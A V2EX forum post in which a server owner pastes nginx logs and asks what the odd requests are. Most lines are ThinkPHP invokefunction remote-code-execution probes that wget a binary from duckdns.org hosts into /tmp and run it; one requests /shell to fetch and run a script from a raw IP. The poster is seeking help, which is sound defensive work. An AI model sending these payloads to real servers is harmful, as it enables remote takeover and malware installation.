服务器有很多莫名请求，请大佬们看下这是什么操作？

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

已注册用户请登录

这是一个创建于 1545 天前的主题，其中的信息可能已经有所发展或是发生改变。

RT，下面是 nginx 日志

42.116.132.217 - - [03/Feb/2020:04:46:21 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
95.56.46.16 - - [03/Feb/2020:04:51:17 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.115.154.162 - - [03/Feb/2020:04:56:31 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.113.229.201 - - [03/Feb/2020:04:56:57 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.117.213.8 - - [03/Feb/2020:05:12:56 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
183.80.226.167 - - [03/Feb/2020:05:43:14 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
1.54.51.37 - - [03/Feb/2020:06:43:59 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
183.81.106.253 - - [03/Feb/2020:06:46:19 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
176.163.32.15 - - [03/Feb/2020:07:16:57 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
189.154.64.227 - - [03/Feb/2020:08:27:51 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
41.248.244.123 - - [03/Feb/2020:09:46:58 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
95.58.245.64 - - [03/Feb/2020:10:01:27 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
1.54.146.50 - - [03/Feb/2020:11:44:40 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.113.211.238 - - [03/Feb/2020:12:02:09 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.118.70.112 - - [03/Feb/2020:12:41:39 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
118.68.197.228 - - [03/Feb/2020:12:56:56 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.117.137.217 - - [03/Feb/2020:13:08:34 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
60.24.45.148 - - [03/Feb/2020:13:39:36 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
58.186.78.50 - - [03/Feb/2020:13:46:47 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
118.71.4.28 - - [03/Feb/2020:15:07:50 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
1.53.177.26 - - [03/Feb/2020:15:08:30 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
61.220.75.34 - - [03/Feb/2020:15:40:00 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
207.216.89.109 - - [03/Feb/2020:16:19:00 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.114.189.116 - - [03/Feb/2020:17:52:09 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
61.80.151.145 - - [03/Feb/2020:18:04:37 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
74.80.28.217 - - [03/Feb/2020:18:25:37 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 575 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
190.122.112.58 - - [03/Feb/2020:18:40:04 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Karu/2.0"

9 条回复 • 2020-02-04 18:35:32 +08:00